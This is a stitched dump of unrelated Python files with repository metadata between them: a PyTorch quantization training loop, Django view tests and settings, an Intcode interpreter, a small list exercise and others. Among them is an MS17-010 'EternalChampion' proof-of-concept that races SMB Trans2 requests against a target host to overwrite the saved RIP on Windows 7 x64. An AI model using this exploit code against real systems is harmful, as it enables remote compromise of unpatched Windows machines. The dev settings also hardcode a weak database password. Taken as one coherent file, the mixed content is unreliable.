transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
trainset = dataloader(root=args.data, train=True, download=True, transform=transform_train)
if args.distributed:
train_sampler = torch.utils.data.distributed.DistributedSampler(trainset)
else:
train_sampler = None
train_loader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=args.workers,
pin_memory=True)
testset = dataloader(root=args.data, train=False, download=True, transform=transform_test)
val_loader = torch.utils.data.DataLoader(testset, batch_size=args.batch_size, shuffle=False, num_workers=args.workers,
pin_memory=True)
elif args.dataname == 'flower':
train_transforms = transforms.Compose([
transforms.RandomRotation(30),
transforms.RandomResizedCrop(size=224),
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
validation_transforms = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
traindir = os.path.join(args.data, 'train')
valdir = os.path.join(args.data, 'valid')
train_data = datasets.ImageFolder(root=traindir, transform=train_transforms)
train_loader = torch.utils.data.DataLoader(train_data, batch_size=args.batch_size, shuffle=True,
num_workers=args.workers, pin_memory=True)
val_data = datasets.ImageFolder(root=valdir, transform=validation_transforms)
val_loader = torch.utils.data.DataLoader(val_data, batch_size=args.batch_size, shuffle=False, num_workers=args.workers,pin_memory=True)
elif args.dataname == 'cub':
transform_cub = transforms.Compose([
transforms.Resize((224, 224)),
transforms.RandomCrop(224, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
])
traindir = os.path.join(args.data, 'train')
valdir = os.path.join(args.data, 'val')
train_data = datasets.ImageFolder(root=traindir, transform=transform_cub)
train_loader = torch.utils.data.DataLoader(train_data, batch_size=args.batch_size, shuffle=True,
num_workers=args.workers, pin_memory=True)
val_data = datasets.ImageFolder(root=valdir, transform=transform_cub)
val_loader = torch.utils.data.DataLoader(val_data, batch_size=args.batch_size, shuffle=False,
num_workers=args.workers, pin_memory=True)
elif args.dataname =='cars':
train_tfm=transforms.Compose([
            transforms.Resize(250),  # Scale was renamed to Resize in torchvision
            transforms.RandomResizedCrop(224),  # RandomSizedCrop was renamed to RandomResizedCrop
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4706145, 0.46000465, 0.45479808), (0.26668432, 0.26578658, 0.2706199))
])
val_tfm=transforms.Compose([
            transforms.Resize(224),  # Scale was renamed to Resize in torchvision
            transforms.RandomResizedCrop(224),  # RandomSizedCrop was renamed to RandomResizedCrop
transforms.ToTensor(),
transforms.Normalize((0.46905602, 0.45872932, 0.4539325), (0.26603131, 0.26460057, 0.26935185))
])
traindir = os.path.join(args.data, 'train')
valdir = os.path.join(args.data, 'val')
train_data = datasets.ImageFolder(root=traindir, transform=train_tfm)
train_loader = torch.utils.data.DataLoader(train_data, batch_size=args.batch_size, shuffle=True,
num_workers=args.workers, pin_memory=True)
val_data = datasets.ImageFolder(root=valdir, transform=val_tfm)
val_loader = torch.utils.data.DataLoader(val_data, batch_size=args.batch_size, shuffle=False,
num_workers=args.workers, pin_memory=True)
elif args.dataname == 'aircraft':
resize = 500
transform_train = transforms.Compose([
transforms.Resize(int(resize / 0.875)),
transforms.RandomCrop(resize),
transforms.RandomHorizontalFlip(0.5),
# transforms.ColorJitter(brightness=0.126, saturation=0.5),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
transform_test = transforms.Compose([
transforms.Resize(int(resize / 0.875)),
transforms.CenterCrop(resize),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
train_dataset = Aircraft(args.data, train=True, download=False,
transform=transform_train)
test_dataset = Aircraft(args.data, train=False, download=False,
transform=transform_test)
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True,
num_workers=args.workers,
pin_memory=True)
val_loader = torch.utils.data.DataLoader(test_dataset, batch_size=args.batch_size, shuffle=False,
num_workers=args.workers,
pin_memory=True)
elif args.dataname == 'food' or args.dataname == 'pets':
train_tfms = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
traindir = os.path.join(args.data, 'train')
valdir = os.path.join(args.data, 'val')
valid_tfms = transforms.Compose([
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
train_data = datasets.ImageFolder(root=traindir, transform=train_tfms)
train_loader = torch.utils.data.DataLoader(train_data, batch_size=args.batch_size, shuffle=True,
num_workers=args.workers, pin_memory=True)
val_data = datasets.ImageFolder(root=valdir, transform=valid_tfms)
val_loader = torch.utils.data.DataLoader(val_data, batch_size=args.batch_size, shuffle=False,
num_workers=args.workers, pin_memory=True)
else:
raise NotImplementedError
if args.evaluate:
# validate(val_loader, full_model, criterion, args)
validate(val_loader, model, criterion, args)
return
print('========= initial architecture =========')
print('start time:',time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime()))
# validate(val_loader, full_model, criterion, args)
if hasattr(model, 'module'):
best_arch, bitops, bita, bitw, mixbitops, mixbita, mixbitw = model.module.fetch_best_arch()
else:
best_arch, bitops, bita, bitw, mixbitops, mixbita, mixbitw = model.fetch_best_arch()
print('best model with bitops: {:.3f}M, bita: {:.3f}K, bitw: {:.3f}M'.format(
bitops, bita, bitw))
print('expected model with bitops: {:.3f}M, bita: {:.3f}K, bitw: {:.3f}M'.format(
mixbitops, mixbita, mixbitw))
for key, value in best_arch.items():
print('{}: {}'.format(key, value))
best_epoch = args.start_epoch
for epoch in range(args.start_epoch, args.epochs):
if args.distributed:
train_sampler.set_epoch(epoch)
adjust_learning_rate(optimizer, arch_optimizer, epoch, args)
# train for one epoch
train(train_loader, model,full_model, criterion, optimizer, arch_optimizer, epoch, args)
print('========= architecture =========')
if hasattr(model, 'module'):
best_arch, bitops, bita, bitw, mixbitops, mixbita, mixbitw = model.module.fetch_best_arch()
else:
best_arch, bitops, bita, bitw, mixbitops, mixbita, mixbitw = model.fetch_best_arch()
print('best model with bitops: {:.3f}M, bita: {:.3f}K, bitw: {:.3f}M'.format(
bitops, bita, bitw))
print('expected model with bitops: {:.3f}M, bita: {:.3f}K, bitw: {:.3f}M'.format(
mixbitops, mixbita, mixbitw))
for key, value in best_arch.items():
print('{}: {}'.format(key, value))
        # evaluate on validation set
acc1 = validate(val_loader, model, criterion, args)
# remember best acc@1 and save checkpoint
is_best = acc1 > best_acc1
best_acc1 = max(acc1, best_acc1)
if is_best:
best_epoch = epoch
if not args.multiprocessing_distributed or (args.multiprocessing_distributed
and args.rank % ngpus_per_node == 0):
save_checkpoint({
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'best_acc1': best_acc1,
'optimizer': optimizer.state_dict(),
'arch_optimizer': arch_optimizer.state_dict(),
}, is_best, epoch, args.step_epoch,filename=args.expname)
print('used time:', time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime()))
print('Best Acc@1 {0} @ epoch {1}'.format(best_acc1, best_epoch))
print('end time:', time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime()))
def cal_l2loss( x, y):
return (F.normalize(x.view(x.size(0), -1)) - F.normalize(y.view(y.size(0), -1))).pow(2).mean()
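# cal_l2loss flattens each sample, L2-normalizes the flattened vectors and
# returns their mean squared difference; train() below uses it to align the
# attribution maps of the quantized model (attr_quant) with those of the
# full-precision model (attr_full).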
def train(train_loader, model,full_model, criterion, optimizer, arch_optimizer, epoch, args):
batch_time = AverageMeter('Time', ':6.3f')
data_time = AverageMeter('Data', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
aux_losses = AverageMeter('Aux Loss',':.4e')
complex_losses = AverageMeter('Complex Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
curr_lr = optimizer.param_groups[0]['lr']
curr_lra = arch_optimizer.param_groups[0]['lr']
progress = ProgressMeter(
len(train_loader),
[batch_time, data_time, losses, aux_losses,complex_losses,top1, top5],
prefix="Epoch: [{}/{}]\t"
"LR: {}\t"
"LRA: {}\t".format(epoch, args.epochs, curr_lr, curr_lra))
# switch to train mode
model.train()
end = time.time()
for i, (images, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
if args.gpu is not None:
images = images.cuda(args.gpu, non_blocking=True)
target = target.cuda(args.gpu, non_blocking=True)
aux_loss=0
output,attr_quant = model(images,mode='swa',TS='Quant')
output_full,attr_full = full_model(images,mode='swa',TS='Full')
if args.pnorm>0:
pnorm=args.pnorm
else:
if hasattr(model, 'module'):
mix_bops = model.module.fetch_bit()
else:
mix_bops = model.fetch_bit()
pnorm=args.product*mix_bops
loss = criterion(output, target)
for l in range(len(attr_full)):
attr_full[l] = torch.pow(attr_full[l], pnorm)
aux_loss += cal_l2loss(attr_full[l], attr_quant[l])
loss=args.aux_weight*aux_loss+loss
# measure accuracy and record loss
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), images.size(0))
aux_losses.update(args.aux_weight*aux_loss.item(),images.size(0))
top1.update(acc1[0], images.size(0))
top5.update(acc5[0], images.size(0))
# complexity penalty
if args.complexity_decay != 0:
if hasattr(model, 'module'):
loss_complexity = args.complexity_decay * model.module.complexity_loss()
else:
loss_complexity = args.complexity_decay * model.complexity_loss()
complex_losses.update(loss_complexity.item(),images.size(0))
loss += loss_complexity
# compute gradient and do SGD step
optimizer.zero_grad()
arch_optimizer.zero_grad()
loss.backward()
optimizer.step()
arch_optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
progress.display(i)
def validate(val_loader, model, criterion, args):
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
progress = ProgressMeter(
len(val_loader),
[batch_time, losses, top1, top5],
prefix='Test: ')
# switch to evaluate mode
model.eval()
with torch.no_grad():
end = time.time()
for i, (images, target) in enumerate(val_loader):
if args.gpu is not None:
images = images.cuda(args.gpu, non_blocking=True)
target = target.cuda(args.gpu, non_blocking=True)
# compute output
output = model(images,mode='eval')
loss = criterion(output, target)
# measure accuracy and record loss
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), images.size(0))
top1.update(acc1[0], images.size(0))
top5.update(acc5[0], images.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
progress.display(i)
# TODO: this should also be done with the ProgressMeter
print(' * Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
return top1.avg
def save_checkpoint(state, is_best, epoch, step_epoch, filename):
if not os.path.isdir(filename):
os.makedirs(filename)
torch.save(state, os.path.join(filename,'arch_checkpoint.pth.tar'))
if is_best:
shutil.copyfile(os.path.join(filename,'arch_checkpoint.pth.tar'), os.path.join(filename,'arch_model_best.pth.tar'))
if (epoch + 1) % step_epoch == 0:
shutil.copyfile(os.path.join(filename,'arch_checkpoint.pth.tar'),os.path.join(filename, 'arch_checkpoint_ep{}.pth.tar'.format(epoch + 1)))
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
class ProgressMeter(object):
def __init__(self, num_batches, meters, prefix=""):
self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
self.meters = meters
self.prefix = prefix
def display(self, batch):
entries = [self.prefix + self.batch_fmtstr.format(batch)]
entries += [str(meter) for meter in self.meters]
print('\t'.join(entries))
def _get_batch_fmtstr(self, num_batches):
num_digits = len(str(num_batches // 1))
fmt = '{:' + str(num_digits) + 'd}'
return '[' + fmt + '/' + fmt.format(num_batches) + ']'
def adjust_learning_rate(optimizer, arch_optimizer, epoch, args):
"""Sets the learning rate to the initial LR decayed by 10 every step_epochs"""
lr = args.lr * (0.1 ** (epoch // args.step_epoch))
lra = args.lra * (0.1 ** (epoch // args.step_epoch))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
for param_group in arch_optimizer.param_groups:
param_group['lr'] = lra
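# Worked example with the defaults above: --lr 0.1 and --step-epoch 30 give
# 0.1 for epochs 0-29, 0.01 for epochs 30-59 and 0.001 for epochs 60-89;
# the architecture learning rate --lra decays on the same schedule.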
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].reshape(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
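# Illustrative example: for logits of shape (batch, num_classes) and integer
# targets, accuracy() returns one single-element tensor per requested k,
# holding the top-k accuracy in percent.
#
#     acc1, acc5 = accuracy(torch.randn(8, 10), torch.randint(0, 10, (8,)), topk=(1, 5))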
if __name__ == '__main__':
main()
| 42.898187
| 146
| 0.602412
|
cbcdf4bf565b42edf1e04e35d5ff79c0fbe5b561
| 247
|
py
|
Python
|
basic lists more exercises/zero to back.py
|
DiyanKalaydzhiev23/fundamentals---python
|
7fa032d9a3270648ffa383bb00dad8e51613189d
|
[
"MIT"
] | null | null | null |
basic lists more exercises/zero to back.py
|
DiyanKalaydzhiev23/fundamentals---python
|
7fa032d9a3270648ffa383bb00dad8e51613189d
|
[
"MIT"
] | null | null | null |
basic lists more exercises/zero to back.py
|
DiyanKalaydzhiev23/fundamentals---python
|
7fa032d9a3270648ffa383bb00dad8e51613189d
|
[
"MIT"
] | null | null | null |
numbers = input().split(",")
zero_list = []
others_list = []
for el in numbers:
element = int(el)
if element == 0:
zero_list.append(element)
else:
others_list.append(element)
others_list += zero_list
print(others_list)
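# Example run (illustrative): for the input "4,0,1,0,2" the zeros are gathered
# separately and appended at the end, so the script prints [4, 1, 2, 0, 0].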
| 20.583333
| 35
| 0.643725
|
fea178a596f5dc1852b2a8f6574b1a05115a0ce9
| 6,769
|
py
|
Python
|
users/tests/test_views.py
|
mmesiti/cogs3
|
c48cd48629570f418b93aec73de49bc2fb59edc2
|
[
"MIT"
] | null | null | null |
users/tests/test_views.py
|
mmesiti/cogs3
|
c48cd48629570f418b93aec73de49bc2fb59edc2
|
[
"MIT"
] | null | null | null |
users/tests/test_views.py
|
mmesiti/cogs3
|
c48cd48629570f418b93aec73de49bc2fb59edc2
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from django.urls import reverse
from institution.models import Institution
from users.models import CustomUser
from users.models import Profile
from users.views import RegisterView, CompleteRegistrationView
class UserViewTests(TestCase):
fixtures = [
'institution/fixtures/tests/institutions.json',
'users/fixtures/tests/users.json',
]
def setUp(self):
self.institution = Institution.objects.get(name='Example University')
self.shibboleth_user = CustomUser.objects.get(email='shibboleth.user@example.ac.uk')
self.guest_user = CustomUser.objects.get(email='guest.user@external.ac.uk')
self.preregistered_user = CustomUser.objects.get(email='preregistered.user@example.ac.uk')
class RegisterViewTests(UserViewTests, TestCase):
def test_register_user(self):
"""
Ensure the register view is accessible for an authenticated shibboleth user.
"""
email = '@'.join(['authorised-user', self.institution.base_domain])
self.assertFalse(CustomUser.objects.filter(email=email).exists())
headers = {
'Shib-Identity-Provider': self.institution.identity_provider,
'REMOTE_USER': email,
}
data = {
'first_name': 'John',
'last_name': 'Smith',
'reason_for_account': 'HPC',
'accepted_terms_and_conditions': True,
}
response = self.client.post(
reverse('register'),
data,
**headers,
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, reverse('login'))
self.assertTrue(CustomUser.objects.filter(email=email).exists())
user = CustomUser.objects.get(email=email)
self.assertEqual(user.profile.account_status, Profile.AWAITING_APPROVAL)
self.assertTrue(user.has_perm('project.add_project'))
def test_register_view_as_unregistered_application_user(self):
"""
Ensure the register view is accessible to an unregistered
application user.
"""
email = '@'.join(['unregistered.user', self.institution.base_domain])
headers = {
'Shib-Identity-Provider': self.institution.identity_provider,
'REMOTE_USER': email,
}
response = self.client.get(
reverse('register'),
**headers,
)
self.assertEqual(response.status_code, 200)
self.assertTrue(isinstance(response.context_data['view'], RegisterView))
def test_register_view_as_preregistered_application_user(self):
"""
Ensure a preregistered application user is redirected to the
complete registration form.
"""
headers = {
'Shib-Identity-Provider': self.shibboleth_user.profile.institution.identity_provider,
'REMOTE_USER': self.preregistered_user.email,
}
response = self.client.get(
reverse('register'),
**headers,
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, reverse('complete-registration'))
def test_register_view_as_authorised_application_user(self):
"""
Ensure an authorised application user is redirected to the dashboard.
"""
headers = {
'Shib-Identity-Provider': self.shibboleth_user.profile.institution.identity_provider,
'REMOTE_USER': self.shibboleth_user.email,
}
response = self.client.get(
reverse('register'),
**headers,
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, reverse('home'))
class CompleteRegistrationViewTests(UserViewTests, TestCase):
def test_complete_registration_view_as_preregistered_application_user(self):
"""
Ensure the complete registration view is accessible to a
preregistered application user.
"""
headers = {
'Shib-Identity-Provider': self.institution.identity_provider,
'REMOTE_USER': self.preregistered_user.email,
}
response = self.client.get(
reverse('complete-registration'),
**headers,
)
self.assertEqual(response.status_code, 200)
self.assertTrue(isinstance(response.context_data['view'],
CompleteRegistrationView))
class LoginViewTests(UserViewTests, TestCase):
def test_login_view_as_an_unauthorised_user(self):
"""
Ensure an unauthorised user is redirected to the register view.
"""
email = '@'.join(['unauthorised-user', self.institution.base_domain])
headers = {
'Shib-Identity-Provider': self.institution.identity_provider,
'REMOTE_USER': email,
}
response = self.client.get(
reverse('login'),
**headers,
)
self.assertEqual(response.status_code, 302)
        self.assertEqual(response.url, reverse('register'))
def test_login_view_as_an_authorised_user(self):
"""
Ensure an authorised user is redirected to the dashboard.
"""
headers = {
'Shib-Identity-Provider': self.institution.identity_provider,
'REMOTE_USER': self.shibboleth_user.email
}
response = self.client.get(
reverse('login'),
**headers,
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, reverse('home'))
class LogoutViewTests(UserViewTests, TestCase):
def test_logout_view_as_an_unauthorised_user(self):
"""
Ensure an unauthorised user is redirected to the register view.
"""
email = '@'.join(['unauthorised-user', self.institution.base_domain])
headers = {
'Shib-Identity-Provider': self.institution.identity_provider,
'REMOTE_USER': email,
}
response = self.client.get(
reverse('logout'),
**headers,
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, reverse('register'))
def test_logout_view_as_an_authorised_user(self):
"""
Ensure an authorised user is redirected to the logout view.
"""
headers = {
'Shib-Identity-Provider': self.institution.identity_provider,
'REMOTE_USER': self.shibboleth_user.email,
}
response = self.client.get(
reverse('logout'),
**headers,
)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, reverse('logged_out'))
| 35.814815
| 98
| 0.629487
|
4854572f8c890b136885150d7fe104d9ce061bbb
| 3,713
|
py
|
Python
|
intcode/cpu.py
|
codedstructure/aoc2019
|
62927bce2091e77c3d6c7de3b8ffce3afd2ccb63
|
[
"MIT"
] | null | null | null |
intcode/cpu.py
|
codedstructure/aoc2019
|
62927bce2091e77c3d6c7de3b8ffce3afd2ccb63
|
[
"MIT"
] | null | null | null |
intcode/cpu.py
|
codedstructure/aoc2019
|
62927bce2091e77c3d6c7de3b8ffce3afd2ccb63
|
[
"MIT"
] | null | null | null |
"""
Intcode CPU interpreter
"""
from queue import Queue
class IntcodeCpu:
def __init__(self, program):
self.ip = 0
self.memory = program
self.save_stack = []
self.input_queue = Queue()
self.output_queue = Queue()
p_count = {
1: 3, 2: 3, 7: 3, 8: 3,
5: 2, 6: 2,
3: 1, 4: 1,
99: 0
}
def run(self):
while True:
opcode, params = self.fetch()
if opcode == 99:
break
prev_ip = self.ip
self.execute(opcode, params)
if self.ip == prev_ip:
self.ip += (1 + len(params))
def fetch(self):
opcode = self.memory[self.ip]
parameter_mode, opcode = divmod(opcode, 100)
# 123 -> [3, 2, 1]; 45 -> [5, 4, 0] etc.
pmode = [int(x) for x in reversed(f'{parameter_mode:03d}')]
params = []
for idx in range(self.p_count[opcode]):
params.append(self.memory[self.ip + idx + 1])
return opcode, tuple(zip(pmode, params))
def execute(self, op, params):
# print(self.ip, op, params)
if op == 1: # add
src1, src2, dest = params
self.store(dest, self.load(src1) + self.load(src2))
elif op == 2: # multiply
src1, src2, dest = params
self.store(dest, self.load(src1) * self.load(src2))
elif op == 3: # input
dest = params[0]
value = self.get_input()
self.store(dest, value)
elif op == 4: # output
dest = params[0]
value = self.load(dest)
self.output(value)
elif op == 5: # jump-if-true
src, jmp = params
value = self.load(src)
if value != 0:
self.ip = self.load(jmp)
elif op == 6: # jump-if-false
src, jmp = params
value = self.load(src)
if value == 0:
self.ip = self.load(jmp)
elif op == 7: # less-than
src1, src2, dest = params
if self.load(src1) < self.load(src2):
self.store(dest, 1)
else:
self.store(dest, 0)
elif op == 8: # equals
src1, src2, dest = params
if self.load(src1) == self.load(src2):
self.store(dest, 1)
else:
self.store(dest, 0)
elif op == 99:
pass
else:
raise ValueError(f'unhandled opcode {op}')
def load(self, param):
pmode, param = param
if pmode == 1:
return param
elif pmode == 0:
return self[param]
else:
raise ValueError(f"Invalid parameter mode {pmode}")
def store(self, param, value):
pmode, param = param
if pmode == 1:
raise ValueError("Cannot store to immediate parameter")
elif pmode == 0:
self[param] = value
else:
raise ValueError(f"Invalid parameter mode {pmode}")
def __str__(self):
return ','.join(str(m) for m in self.memory)
def __getitem__(self, idx):
return self.memory[idx]
def __setitem__(self, idx, val):
try:
self.memory[idx] = val
except IndexError:
print(f"Bus error writing {val} to {idx}")
raise
def push_state(self):
self.save_stack.append((self.ip, self.memory.copy()))
def pop_state(self):
self.ip, self.memory = self.save_stack.pop()
def get_input(self):
return self.input_queue.get()
def output(self, value):
print(value)
self.output_queue.put(value)
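# Minimal usage sketch (added for illustration; not part of the original module).
# Runs the small program [1, 0, 0, 0, 99]: opcode 1 adds the values stored at
# positions 0 and 0 and writes the sum back to position 0, then opcode 99 halts.
if __name__ == '__main__':
    cpu = IntcodeCpu([1, 0, 0, 0, 99])
    cpu.run()
    print(cpu)  # prints "2,0,0,0,99"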
| 28.343511
| 67
| 0.496095
|
32494830dc6d015a3c11faa7b3ac4b00e13961f4
| 2,591
|
py
|
Python
|
MS17-010/eternalchampion_poc.py
|
eaneatfruit/ExploitDev
|
ebe4b61a2b15395c0d389e9ff7cc6a68a1b4e275
|
[
"MIT"
] | null | null | null |
MS17-010/eternalchampion_poc.py
|
eaneatfruit/ExploitDev
|
ebe4b61a2b15395c0d389e9ff7cc6a68a1b4e275
|
[
"MIT"
] | null | null | null |
MS17-010/eternalchampion_poc.py
|
eaneatfruit/ExploitDev
|
ebe4b61a2b15395c0d389e9ff7cc6a68a1b4e275
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
from impacket import smb
from mysmb import MYSMB
from struct import pack
import sys
'''
PoC: demonstrates how NSA eternalchampion controls RIP
Note:
- this PoC is tested against only Windows 7 x64 with 2 and 4 logical processors
'''
USERNAME = ''
PASSWORD = ''
if len(sys.argv) != 2:
print("{} <ip>".format(sys.argv[0]))
sys.exit(1)
target = sys.argv[1]
conn = MYSMB(target)
conn.login(USERNAME, PASSWORD)
# if share name is disk, the race is easier to win because there are more operation to do after InData is modified
tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
conn.set_default_tid(tid)
def nsa_race(conn, jmp_addr):
setup = pack('<H', 5) # QUERY_PATH_INFO
# set info level to SMB_INFO_QUERY_EA_SIZE at request to force SrvSmbQueryPathInformation restart in another thread
param = pack('<HI', 2, 0) + '\x00'*4 # infoLevel, reserved, filename
mid = conn.next_mid()
# we will overwrite 8 bytes at displacement 312, so data must be at least 320 bytes
req1 = conn.create_trans2_packet(setup, param=param, data='A'*324, mid=mid)
# change infoLevel parameter to SMB_INFO_IS_NAME_VALID
req2 = conn.create_trans2_secondary_packet(mid, param=pack('<H', 6))
req3 = conn.create_trans2_secondary_packet(mid, data=pack('<Q', jmp_addr), dataDisplacement=312)
conn.send_raw(req1+req2+req3*8)
recvPkt = conn.recvSMB()
status = recvPkt.getNTStatus()
if status == 0xc0000022: # ACCESS_DENIED
# fail to modify infoLevel parameter to SMB_INFO_IS_NAME_VALID
#print('the race is completely fail')
sys.stdout.write('.')
elif status == 0xc0000010: # INVALID_DEVICE_REQUEST
#print('there is a race')
sys.stdout.write('*')
else:
sys.stdout.write('?')
sys.stdout.flush()
def my_race(conn, jmp_addr):
setup = pack('<H', 5) # QUERY_PATH_INFO
param = pack('<HI', 6, 0) + '\x00'*4 # infoLevel, reserved, filename
# directly race
for i in range(8):
mid = conn.next_mid()
req1 = conn.create_trans2_packet(setup, param=param, data='A'*324, mid=mid)
req3 = conn.create_trans2_secondary_packet(mid, data=pack('<Q', jmp_addr), dataDisplacement=312)
conn.send_raw(req1+req3*11)
for i in range(8):
recvPkt = conn.recvSMB()
if recvPkt.getNTStatus() != 0xc0000010:
#print('return status: 0x{:x}'.format(recvPkt.getNTStatus()))
sys.stdout.write('*')
else:
sys.stdout.write('.')
sys.stdout.flush()
while True:
# if win a race, saved RIP will be modified to 0x4141414141414141
nsa_race(conn, 0x4141414141414141)
#my_race(conn, 0x4141414141414141)
conn.disconnect_tree(tid)
conn.logoff()
conn.get_socket().close()
| 30.127907
| 116
| 0.719027
|
73372b2bc7e3e1f4e1a7ab8597aeeb47b414fde2
| 2,622
|
py
|
Python
|
settings/dev.py
|
forevergao/loonflow
|
c21f6a7fa01ec6a4be1dcfc08c3ca40c6c3e42bd
|
[
"MIT"
] | 1
|
2019-04-24T12:39:07.000Z
|
2019-04-24T12:39:07.000Z
|
settings/dev.py
|
awsay/loonflow
|
d745f64bfa3d7892fb47e62ed7cec172ddac7c28
|
[
"MIT"
] | 1
|
2019-04-02T06:32:03.000Z
|
2019-04-02T06:32:03.000Z
|
settings/dev.py
|
awsay/loonflow
|
d745f64bfa3d7892fb47e62ed7cec172ddac7c28
|
[
"MIT"
] | null | null | null |
from settings.common import *
MIDDLEWARE = [
'service.csrf_service.DisableCSRF',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'service.permission.api_permission.ApiPermissionCheck',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'loonflownew', # Or path to database file if using sqlite3.
'USER': 'loonflownew', # Not used with sqlite3.
'PASSWORD': '123456', # Not used with sqlite3.
'HOST': '127.0.0.1', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '3306', # Set to empty string for default. Not used with sqlite3.
}
}
REDIS_HOST = '127.0.0.1'
REDIS_PORT = 6379
REDIS_DB = 0
REDIS_PASSWORD = ''
CELERY_BROKER_URL = 'redis://127.0.0.1:6379/1'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
},
'formatters': {
'standard': {
'format': '%(asctime)s %(pathname)s process-%(process)d thread-%(thread)d %(lineno)d [%(levelname)s]: %(message)s',
},
},
'handlers': {
'file_handler': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.environ['HOME'] + '/loonflow.log',
'formatter': 'standard'
},
'console': {
'level': 'DEBUG',
'filters': ['require_debug_true'],
'class': 'logging.StreamHandler',
'formatter': 'standard'
},
},
'loggers': {
'django': {
'handlers': ['file_handler'],
'propagate': True,
'level': 'INFO',
},
'django.db.backends': {
'handlers': ['console'],
'propagate': True,
'level': 'INFO',
}
}
}
| 33.615385
| 131
| 0.539283
|
31722da3c39424845250f7d9b1e98eadce8bb293
| 1,539
|
py
|
Python
|
athena/horovod_main.py
|
Huang17/athena
|
9077f57f5b7aa64a28487d8b30f1781783d45a42
|
[
"Apache-2.0"
] | 1
|
2020-08-26T08:56:49.000Z
|
2020-08-26T08:56:49.000Z
|
athena/horovod_main.py
|
shuaijiang/athena-2
|
5d4d6d13075b8ee9fd824ce6258cb8f55dd157eb
|
[
"Apache-2.0"
] | null | null | null |
athena/horovod_main.py
|
shuaijiang/athena-2
|
5d4d6d13075b8ee9fd824ce6258cb8f55dd157eb
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright (C) 2019 ATHENA AUTHORS; Xiangang Li
